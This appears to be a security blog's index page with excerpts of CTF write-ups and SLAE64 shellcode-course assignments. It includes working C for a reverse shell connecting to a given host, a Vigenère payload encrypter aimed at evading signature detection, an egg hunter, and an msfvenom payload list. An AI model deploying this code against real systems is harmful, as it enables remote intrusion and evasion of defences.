Codehead's Corner
Random ramblings on hacking, coding, fighting with infrastructure and general tech
Posted: 19 Feb 2018 by Codehead
3 minute read

Problem

Easy and Peasy

nc 35.200.197.38 8003

Europe: nc 35.205.196.143 8003

Like many of the EvlzCTF challenges, this one was a little light on detail, but fun to complete.


Categories: Hacking CTF
Posted: 28 Jan 2018 by Codehead
2 minute read

Problem

Description: this chall sucks, you should watch VIE vs UZB match. :)
VIET NAM VO DICH!
Author: kad96
Website: Link

Visiting the website gave me a blank page. There had to be something more hidden here.


Categories: Hacking CTF
Posted: 23 Jan 2018 by Codehead
2 minute read

Challenge

Aalekh joined IIIT in 2014. Soon, he started selling T-shirts and hoodies. One day, Aalekh got a big order and trusted his childhood friend to handle the order. But his friend betrayed him and sold bad pieces. College students got angry and tried to beat Aalekh up. His good friend, Anshul, wanted to save him. To prevent Aalekh from going under loss, he has to sell 500 T-shirts on the market, the only condition being, customers have to be unique.

Can you help Anshul sell 500 T-shirts?

https://felicity.iiit.ac.in/contest/breakin/questions/uuid/

Flag Format: BREAKIN{[0-9A-Za-z_]+}


Categories: Hacking CTF
Posted: 13 Jan 2018 by Codehead
5 minute read

TL;DR

Command Files allow you to start up gdb in a way that saves you typing the same commands over and over, even doing some of the ‘driving’ for you. I’m not suggesting that this is the best way to use gdb but I found it really helpful and I saved a bunch of time. I’m blogging it for my own reference and to help others find a lesser known, but very useful feature of the tool.

Background

While working on the SLAE64 course assessments, I found myself jumping in and out of gdb a lot. Constantly rebuilding and refining my shellcode test binaries meant that I ended up in a constant cycle of doing a whole heap of setup in gdb to get things the way I wanted them, only to spend a few seconds debugging the target, then quitting, tweaking the code, rebuilding and repeating the whole process again.

I’m not a great typist, but I keyed in this sequence so many times that I could probably do it in my sleep:

layout asm
layout reg
break _start
run

There has to be a better way.


Categories: linux assembler hacking
Posted: 28 Nov 2017 by Codehead
12 minute read

After completing the video lectures of the Security Tube Linux 64 bit Assembler Expert course (SLAE64), a series of assessments must be completed to gain certification. This is the seventh and final assignment; build a payload encrypter/decrypter.

We have used payload encoders in previous assignments, but this time we will build a hidden payload that requires a key to decrypt.

The choice of encryption method is left to the student and I spent a good while looking at the various encryption methods:

  • AES - A modern and widely used block cipher scheme. Very complex to implement and would probably require a 3rd party library, making the assignment pretty pointless.
  • RC4 - A fast and relatively easy to implement stream cipher. Unfortunately, Vivek used RC4 in his demo; I didn’t want to repeat his work.
  • FISH, Scream, MUGI, etc - Complex, limited implementation documentation (my maths isn’t up to scratch).

While researching these schemes I stumbled onto some of the more classical cryptography schemes.

Modern ciphers produce a keystream of pseudo-random bytes (a stream cipher, or a block cipher in a mode such as CTR) that is XORed against the plaintext; classical ciphers instead transposed characters or shifted them through the alphabet. Simple rotational schemes such as Caesar’s cipher or ROT13 barely qualify as encryption: the shift is either fixed or trivially brute forced, since there are only 25 of them. A substitution cipher needs a mapping table, and because that table can be varied it acts as a kind of key, although a large and cumbersome one.

The Vigenère cipher is a polyalphabetic substitution: each character of a repeating key selects a Caesar shift, and the familiar table is just the 26 shifts laid out in ascending order. Because the key can be any length and the operation is a simple add on one side and subtract on the other, it suits this assignment. It is, however, broken by classical analysis (a repeating key leaks its own length, after which each key position reduces to a single Caesar shift), so it only hides the payload from signature matching; it is not a confidentiality control.


Posted: 24 Nov 2017 by Codehead
11 minute read

After completing the video lectures of the Security Tube Linux 64 bit Assembler Expert course (SLAE64), a series of assessments must be completed to gain certification. This is the sixth assignment; take three x64 payloads from ShellStorm and create new, polymorphic versions which have the same functionality.

While this sounds super cool, what we’re actually doing is changing the bytes of the shellcode, while preserving its behaviour, to evade basic security tools that recognise threats by signature matching. A constraint of the assignment is to stay within 150% of the original payload size.


Posted: 22 Nov 2017 by Codehead
18 minute read

After completing the video lectures of the Security Tube Linux 64 bit Assembler Expert course (SLAE64), a series of assessments must be completed to gain certification. This is the fifth assignment; analyse 3 payloads generated by the Metasploit msfvenom tool.

msfvenom replaces the msfpayload and msfencode tools, combining their functionality in a single application. The payloads available specifically for x64 Linux are quite limited:

root@kali:~# msfvenom -l | grep linux/x64

linux/x64/exec                                      Execute an arbitrary command
linux/x64/meterpreter/bind_tcp                      Inject the mettle server payload (staged). Listen for a connection
linux/x64/meterpreter/reverse_tcp                   Inject the mettle server payload (staged). Connect back to the attacker
linux/x64/meterpreter_reverse_http                  Run the Meterpreter / Mettle server payload (stageless)
linux/x64/meterpreter_reverse_https                 Run the Meterpreter / Mettle server payload (stageless)
linux/x64/meterpreter_reverse_tcp                   Run the Meterpreter / Mettle server payload (stageless)
linux/x64/shell/bind_tcp                            Spawn a command shell (staged). Listen for a connection
linux/x64/shell/reverse_tcp                         Spawn a command shell (staged). Connect back to the attacker
linux/x64/shell_bind_tcp                            Listen for a connection and spawn a command shell
linux/x64/shell_bind_tcp_random_port                Listen for a connection in a random port and spawn a command shell. 
                                                    Use nmap to discover the open port: 'nmap -sS target -p-'.
linux/x64/shell_find_port                           Spawn a shell on an established connection
linux/x64/shell_reverse_tcp                         Connect back to attacker and spawn a command shell

Posted: 9 Nov 2017 by Codehead
7 minute read

After completing the video lectures of the Security Tube Linux 64 bit Assembler Expert course (SLAE64), a series of assessments must be completed to gain certification. This is the fourth assignment; create a custom encoder/decoder to disguise a shellcode payload.

Many security and threat-monitoring tools rely on signature matching to identify bad code. A good way to avoid signature-based detection is to obscure the content of a payload with encryption or encoding. The same payload can be disguised again and again with different obfuscation schemes, and creating a new encoding method is much simpler than building a new payload.

For the assignment, we will design a simple encoding scheme, create an encoding script to disguise our shellcode and write a decoder stub which we will deploy with the payload to rebuild the original code on the fly.
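As an added example serving both this encoder assignment and the Vigenère encrypter in the seventh-assignment post above (written for this page, not the course’s or the author’s code): a byte-wise Vigenère, generalised from letters mod 26 to raw bytes mod 256, with the matching decryption, run over a constructed stand-in for shellcode bytes. It also counts null bytes in the output, the check a shellcode encoder has to make before committing to a key, since a null in the encrypted payload terminates C strings and breaks many delivery paths. The sample bytes and the key are constructed for the demo.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Byte-wise Vigenère. The alphabetic cipher adds the key letter to the
 * plaintext letter mod 26; over raw shellcode bytes the alphabet is 0..255,
 * so the shift becomes an addition mod 256 and decryption is the matching
 * subtraction. The key repeats: byte i is shifted by key[i % klen].
 */
void vig_encrypt(const uint8_t *in, uint8_t *out, size_t n,
                 const uint8_t *key, size_t klen)
{
    for (size_t i = 0; i < n; i++)
        out[i] = (uint8_t)(in[i] + key[i % klen]);
}

void vig_decrypt(const uint8_t *in, uint8_t *out, size_t n,
                 const uint8_t *key, size_t klen)
{
    for (size_t i = 0; i < n; i++)
        out[i] = (uint8_t)(in[i] - key[i % klen]);
}

/* A null byte in the encrypted payload ends a C string (strcpy, sprintf and
 * friends stop there), so the encoder must count them and pick a different
 * key if any appear. */
size_t count_nulls(const uint8_t *buf, size_t n)
{
    size_t c = 0;
    for (size_t i = 0; i < n; i++)
        if (buf[i] == 0)
            c++;
    return c;
}

/* Round trip on a constructed stand-in for shellcode (xor rax,rax; xor rdi,rdi;
 * syscall), not a real payload. Returns 1 when decrypt(encrypt(x)) == x and the
 * ciphertext actually differs from the plaintext. */
int vig_roundtrip_ok(void)
{
    const uint8_t plain[] = { 0x48, 0x31, 0xc0, 0x48, 0x31, 0xff, 0x0f, 0x05 };
    const uint8_t key[]   = { 's', '3', 'c', 'r', '3', 't' };   /* constructed key */
    uint8_t enc[sizeof plain], dec[sizeof plain];

    vig_encrypt(plain, enc, sizeof plain, key, sizeof key);
    vig_decrypt(enc, dec, sizeof plain, key, sizeof key);
    return memcmp(plain, dec, sizeof plain) == 0
        && memcmp(plain, enc, sizeof plain) != 0;
}
```

The decoder stub that ships with the payload only needs the subtract loop and the key; everything else (the null-byte check, key selection) stays in the encoder on the attacker's side. When count_nulls reports anything other than zero, change the key and encrypt again rather than trying to patch the output.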


Categories: SLAE64 Assembler Shellcode
Posted: 6 Nov 2017 by Codehead
10 minute read

After completing the video lectures of the Security Tube Linux 64 bit Assembler Expert course (SLAE64), a series of assessments must be completed to gain certification. This is the third assignment; research and create an egg hunter proof of concept.

Egg hunting is a technique for working around shellcode space restrictions. The egg hunter is a very small piece of code that searches the process memory for an ‘egg’: a known sequence of bytes that marks the start of the real payload, which can be much larger. Once the egg is located, execution is redirected to the bytes that follow it. Two details make this work in practice: the egg is usually a 4-byte tag written twice, so the hunter (which only ever holds the tag once) never matches its own code, and the hunter has to find out whether each page is mapped, typically with a cheap system call, before reading it, or the search itself would crash on the first unmapped address.
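An added proof of concept in C (written for this page; not the assignment’s assembly and not the author’s code) of those two details: every 8-byte window is probed with access(2) before it is read, and the 4-byte tag is compared twice. The three-page mmap region with its middle page unmapped, the tag value 0x50905090 and the offset at which the egg is planted are all constructed for the demo.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* access(2) makes the kernel read a path string at addr. EFAULT coming back
 * means the page is not mapped, so the hunter can skip it instead of faulting;
 * any other result (usually ENOENT) means the bytes were readable. */
static int unmapped(const void *addr)
{
    return access((const char *)addr, F_OK) == -1 && errno == EFAULT;
}

/* Scan [start, end) for the egg: the 4-byte tag written twice. Only the 4-byte
 * tag lives in the hunter, compared twice, so the hunter's own bytes never
 * contain the 8-byte egg and it cannot find itself. Returns a pointer just
 * past the egg (where the real payload begins), or NULL. */
unsigned char *egg_hunt(unsigned char *start, unsigned char *end, uint32_t tag)
{
    uintptr_t mask = (uintptr_t)sysconf(_SC_PAGESIZE) - 1;
    unsigned char *p = start;

    while (p + 8 <= end) {
        /* Probe both ends of the 8-byte window so the compare cannot touch an
         * unmapped page; on EFAULT jump to the next page boundary. */
        if (unmapped(p) || unmapped(p + 7)) {
            p = (unsigned char *)(((uintptr_t)p | mask) + 1);
            continue;
        }
        if (memcmp(p, &tag, 4) == 0 && memcmp(p + 4, &tag, 4) == 0)
            return p + 8;
        p++;
    }
    return NULL;
}

/* Constructed scenario: three anonymous pages, the middle one unmapped to stand
 * in for a hole between segments, the egg planted in the third page. Returns 1
 * when the hunter lands exactly on the byte after the egg. A real hunter would
 * jump there; this one only reports the address. */
int egg_hunt_demo(void)
{
    long page = sysconf(_SC_PAGESIZE);
    unsigned char *region = mmap(NULL, 3 * page, PROT_READ | PROT_WRITE,
                                 MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (region == MAP_FAILED)
        return -1;
    if (munmap(region + page, page) != 0)
        return -1;

    uint32_t tag = 0x50905090;          /* bytes 90 50 90 50: nop / push rax, executable */
    unsigned char *payload = region + 2 * page + 100;
    memcpy(payload, &tag, 4);           /* egg = tag, tag */
    memcpy(payload + 4, &tag, 4);

    unsigned char *hit = egg_hunt(region, region + 3 * page, tag);
    int ok = (hit == payload + 8);

    munmap(region, page);
    munmap(region + 2 * page, page);
    return ok;
}
```

The per-byte probing costs two system calls per address, which is what makes egg hunters slow rather than unsafe; the assembly version trades that for a handful of bytes of code. The tag is chosen so that it is itself valid code (nop; push rax), which lets the hunter jump to the egg rather than past it if that saves a few bytes.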


Categories: SLAE64 Assembler Shellcode
Posted: 27 Oct 2017 by Codehead
12 minute read

After completing the video lectures of the Security Tube Linux 64 bit Assembler Expert course (SLAE64), a series of assessments must be completed to gain certification. This write up is for the second assignment: Create a shellcode string that will start a TCP Reverse Shell.

A reverse shell connects to a remote host on a given network address and port. Any commands issued by the remote host are relayed to a local shell on the target in the same way as the bind shell.


Having the target reach out to the remote machine may seem like an odd way of making the connection, especially as the remote must be ready and listening for the connection to be successful. However, this type of connection is preferable if the target is behind a firewall or a network address translation (NAT) layer which would make an inbound connection to a bind shell difficult.

As with the bind shell, a passphrase must be implemented to add a layer of security to the program.
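The syscall sequence the shellcode has to issue, written out in C as an added example (not the assignment’s payload and not the author’s code): socket, connect, a passphrase gate, dup2 onto the three standard descriptors, then execve. The address, port and passphrase are whatever the caller passes in. The passphrase crosses the network in clear, so it stops a stray listener from being handed a shell; it does nothing against an observer on the path.

```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <stddef.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Read one line from fd and compare it with the expected passphrase. Reads a
 * byte at a time so a slow sender or a split packet cannot cause a partial
 * compare, and is bounded so an over-long line cannot overflow the buffer.
 * Returns 1 on a match, 0 otherwise (including peer closed or error). */
int passphrase_ok(int fd, const char *expected)
{
    char line[64];
    size_t n = 0;

    while (n < sizeof line - 1) {
        char c;
        if (read(fd, &c, 1) != 1)
            return 0;
        if (c == '\n')
            break;
        line[n++] = c;
    }
    line[n] = '\0';
    return strcmp(line, expected) == 0;
}

/* socket -> connect -> passphrase gate -> dup2 -> execve: the same sequence
 * the reverse-shell shellcode issues. Returns only on failure (-1). */
int reverse_shell(const char *ip, unsigned short port, const char *passphrase)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;

    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    if (inet_pton(AF_INET, ip, &sa.sin_addr) != 1) {
        close(fd);
        return -1;
    }

    /* Outbound connection: passes NAT and most egress filtering, which is why
     * this is preferred over a bind shell when the target is behind either. */
    if (connect(fd, (struct sockaddr *)&sa, sizeof sa) != 0) {
        close(fd);
        return -1;
    }

    /* Gate the shell on the passphrase; a wrong answer drops the connection. */
    if (!passphrase_ok(fd, passphrase)) {
        close(fd);
        return -1;
    }

    /* Wire the socket to stdin, stdout and stderr so the remote end drives the shell. */
    for (int i = 0; i < 3; i++)
        dup2(fd, i);

    char *const argv[] = { "/bin/sh", NULL };
    execve("/bin/sh", argv, NULL);
    return -1;   /* only reached if execve failed */
}
```

In the shellcode version the same steps collapse to six system calls (socket, connect, read, dup2 three times, execve); the bounded read-and-compare loop is where most of the extra bytes go, which is why the assembly usually reads a fixed-size passphrase in one go instead.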


Categories: SLAE64 Assembler Shellcode
Site powered by Hugo.
Polymer theme by pdevty, tweaked by Codehead